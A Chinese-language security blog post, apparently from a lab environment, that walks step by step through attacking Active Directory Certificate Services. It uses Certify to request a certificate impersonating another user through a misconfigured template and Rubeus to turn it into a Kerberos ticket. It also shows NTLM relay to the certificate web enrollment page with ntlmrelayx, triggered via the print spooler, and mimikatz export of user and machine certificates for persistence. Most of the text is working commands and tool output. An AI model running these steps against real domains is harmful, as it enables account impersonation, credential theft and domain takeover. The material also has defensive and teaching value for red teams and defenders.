Active Directory CS的几种打法

2024年10月7日00:08:26评论22 views字数 5793阅读19分18秒阅读模式

前言

AD CS 用于设置私有企业证书颁发机构 (CA)，然后用于颁发将用户或机器身份或账户绑定到公私密钥对的证书，允许该密钥对用于不同的操作，例如文件加密、签署文件或文档和身份验证。AD CS 管理员定义证书模板，这些模板用作证书颁发方式、颁发给谁、进行何种操作、持续多长时间以及他们拥有哪些加密设置的蓝图。

正文

通过Certify的CAS查找 CA

beacon> execute-assembly C:ToolsCertifyCertifybinReleaseCertify.exe cas

通过Certify的find vulnerable,查找有问题的模板

beacon> execute-assembly C:ToolsCertifyCertifybinReleaseCertify.exe find /vulnerable

Active Directory CS的几种打法

这个输出信息中有几个关键信息

这个模板由sub-ca提供

这个模板叫做CustomUser

ENROLLEE_SUPPLIES_SUBJECT被启用，这个允许认证申请者自定义名字

DEVDomain用户拥有，允许任意域用户申请认证通过这个模板

这时候我们通过Certify进行证书申请

beacon> getuid
[*] You are DEVbfarmer

beacon> execute-assembly C:ToolsCertifyCertifybinReleaseCertify.exe request /ca:dc-2.dev.cyberbotic.iosub-ca /template:CustomUser /altname:nlamb

[*] Action: Request a Certificates
[*] Current user context    : DEVbfarmer
[*] No subject name specified, using current context as subject.

[*] Template                : CustomUser
[*] Subject                 : CN=Bob Farmer, CN=Users, DC=dev, DC=cyberbotic, DC=io
[*] AltName                 : nlamb

[*] Certificate Authority   : dc-2.dev.cyberbotic.iosub-ca

[*] CA Response             : The certificate had been issued.
[*] Request ID              : 11

[*] cert.pem         :

-----BEGIN RSA PRIVATE KEY-----
[...]
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
[...]
-----END CERTIFICATE-----

[*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

Certify completed in 00:00:05.4521116

生成cert.pem

ubuntu@DESKTOP-3BSK7NO ~> openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
Enter Export Password: pass123
Verifying - Enter Export Password: pass123

生成cert.pfx

ubuntu@DESKTOP-3BSK7NO ~> cat cert.pfx | base64 -w 0
MIIM7w[...]ECAggA

用rubeus使用这个凭据

beacon> execute-assembly C:ToolsRubeusRubeusbinReleaseRubeus.exe asktgt /user:nlamb /certificate:MIIM7w[...]ECAggA /password:pass123 /nowrap

[*] Using PKINIT with etype rc4_hmac and subject: CN=Bob Farmer, CN=Users, DC=dev, DC=cyberbotic, DC=io 
[*] Building AS-REQ (w/ PKINIT preauth) for: 'dev.cyberbotic.ionlamb'
[*] Using domain controller: 10.10.122.10:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

      doIGQj[...]5pbw==

  ServiceName              :  krbtgt/dev.cyberbotic.io
  ServiceRealm             :  DEV.CYBERBOTIC.IO
  UserName                 :  nlamb
  UserRealm                :  DEV.CYBERBOTIC.IO
  StartTime                :  9/7/2022 8:51:22 AM
  EndTime                  :  9/7/2022 6:51:22 PM
  RenewTill                :  9/14/2022 8:51:22 AM
  Flags                    :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType                  :  rc4_hmac
  Base64(key)              :  AliVFc5Nk93Z7IUkweCnBQ==
  ASREP (key)              :  4DB9D9D76701696109C28A26D27DE0B0

AD CS支持http请求，并且提供一个可视化界面，可以通过http

展开收缩

://<hostname>/certsrv。如果ntlm认证是被允许的，可以通过ntlm委派来进行攻击，但是这里有一个前提，AD CS和域控不能在一台机上。另一个比较好用的方法是通过非约束委派进行攻击。

这里用ntlm中继做例子

启动ntlmrelayx

attacker@ubuntu ~> sudo proxychains ntlmrelayx.py -t https://10.10.122.10/certsrv/certfnsh.asp -smb2support --adcs --no-http-server

[*] Protocol Client SMTP loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up HTTP Server
[*] Setting up WCF Server
[*] Setting up RAW Server on port 6666

[*] Servers started, waiting for connections

通过打印机回连

beacon> execute-assembly C:ToolsSharpSystemTriggersSharpSpoolTriggerbinReleaseSharpSpoolTrigger.exe 10.10.122.30 10.10.123.102

[*] Servers started, waiting for connections
[*] SMBD-Thread-4: Received connection from 127.0.0.1, attacking target https://10.10.122.10
|S-chain|-<>-127.0.0.1:1080-<><>-10.10.122.10:443-<><>-OK
[*] HTTP server returned error code 200, treating as a successful login
[*] Authenticating against https://10.10.122.10 as DEV/WEB$ SUCCEED
[*] Generating CSR...
[*] CSR generated!
[*] Getting certificate...
[*] GOT CERTIFICATE! ID 13
[*] Base64 certificate of user WEB$:MIIRRQ[...]qDRJLE

接下来是权限维持部分

通过seatbelt的Certificates枚举本地

beacon> getuid
[*] You are DEVnlamb

beacon> run hostname
wkstn-1

beacon> execute-assembly C:ToolsSeatbeltSeatbeltbinReleaseSeatbelt.exe Certificates

  StoreLocation      : CurrentUser
  Issuer             : CN=sub-ca, DC=dev, DC=cyberbotic, DC=io
  Subject            : [email protected], CN=Nina Lamb, CN=Users, DC=dev, DC=cyberbotic, DC=io
  ValidDate          : 9/7/2022 11:44:35 AM
  ExpiryDate         : 9/7/2023 11:44:35 AM
  HasPrivateKey      : True
  KeyExportable      : True
  Thumbprint         : 43FA3C3AE4E1212A3F888937745C2E2F55BAC1B5
  Template           : User
  EnhancedKeyUsages  :
       Encrypting File System
       Secure Email
       Client Authentication     [!] Certificate is used for client authentication!

通过mimikatz的crypto::certificates导出证书

beacon> mimikatz crypto::certificates /export

    Public export  : OK - 'CURRENT_USER_My_0_Nina Lamb.der'
    Private export : OK - 'CURRENT_USER_My_0_Nina Lamb.pfx'

beacon> download CURRENT_USER_My_0_Nina Lamb.pfx
[*] started download of C:UsersnlambCURRENT_USER_My_0_Nina Lamb.pfx (3454 bytes)
[*] download of CURRENT_USER_My_0_Nina Lamb.pfx is complete

导出机器账户证书

beacon> mimikatz !crypto::certificates /systemstore:local_machine /export

    Public export  : OK - 'local_machine_My_0_wkstn-1.dev.cyberbotic.io.der'
    Private export : OK - 'local_machine_My_0_wkstn-1.dev.cyberbotic.io.pfx'

beacon> execute-assembly C:ToolsRubeusRubeusbinReleaseRubeus.exe asktgt /user:WKSTN-1$ /enctype:aes256 /certificate:MIINCA[...]IH0A== /password:mimikatz /nowrap

[*] Action: Ask TGT

[*] Using PKINIT with etype aes256_cts_hmac_sha1 and subject: CN=wkstn-1.dev.cyberbotic.io 
[*] Building AS-REQ (w/ PKINIT preauth) for: 'dev.cyberbotic.ioWKSTN-1$'
[*] Using domain controller: 10.10.122.10:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

    doIGYD[...]5pbw==

  ServiceName              :  krbtgt/dev.cyberbotic.io
  ServiceRealm             :  DEV.CYBERBOTIC.IO
  UserName                 :  WKSTN-1$
  UserRealm                :  DEV.CYBERBOTIC.IO
  StartTime                :  9/7/2022 12:06:02 PM
  EndTime                  :  9/7/2022 10:06:02 PM
  RenewTill                :  9/14/2022 12:06:02 PM
  Flags                    :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType                  :  aes256_cts_hmac_sha1
  Base64(key)              :  6DV6vQB5lRoCz84qmRqt0X6UdIzzdQiX+y0IwwDrHlc=
  ASREP (key)              :  C1B715AF5F9B5468EB5FA8ADDA0E02EE2D7548F439DEA5A5D9B4F7DFA6482BDF

如果使用Certify去申请机器账户证书，加上machine这个参数以SYSTEM权限申请

beacon> execute-assembly C:ToolsCertifyCertifybinReleaseCertify.exe request /ca:dc-2.dev.cyberbotic.iosub-ca /template:Machine /machine

原文始发于微信公众号（Th0r安全）：Active Directory CS的几种打法

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

Active Directory CS的几种打法

前言

正文

文件上传黑名单限制的绕过总结

metasploit（1）生成远控木马

Ghost

利用Claude3.7分析wireshark流量包

JS逆向 —— 基于 gRPC 的加解密对抗

Nyx-1 综合靶机实战思路

打靶日记 Pinkys Palace v2

内存取证 - 练习篇3(Lovelymem一把梭)

一文玩转验证码漏洞

HTB_Nocturnal

发表评论

在线咨询

微信